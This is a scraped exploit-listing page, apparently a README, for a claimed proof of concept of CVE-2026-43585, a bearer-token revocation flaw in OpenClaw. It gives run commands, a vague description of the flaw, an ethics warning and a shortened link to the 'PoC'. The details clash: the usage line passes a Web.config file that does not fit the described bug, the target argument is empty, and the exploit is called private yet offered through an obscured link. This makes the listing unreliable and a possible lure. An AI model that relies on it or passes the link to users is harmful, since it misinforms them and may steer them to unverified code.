Share
## https://sploitus.com/exploit?id=8F65E47C-61B5-5D63-B3AA-5621A3EC3FEB
# CVE-2026-43585

### Overview
Prior to version 2026.4.15, OpenClaw does not properly handle bearer token authentication post-SecretRef rotation.

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target  --file "/path/to/Web.config"`

Details
- CVE ID: CVE-2026-43585
- Discovered: 2026-04-15
- Published: 2026-05-6
- Exploit Availability: Not public, only private.

### How It Works
This oversight allows attackers to exploit revoked tokens that have not been invalidated correctly at the gateway, leading to unauthorized access. The system captures and retains the obsolete bearer-auth configuration during startup, resulting in a security weakness that can be leveraged for unauthorized actions via HTTP and WebSocket handlers.

### Ethical Use Warning
- This script is a proof-of-concept for CVE-2026-43585 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC Exploit - [href](https://tinyurl.com/ydrjnkyp)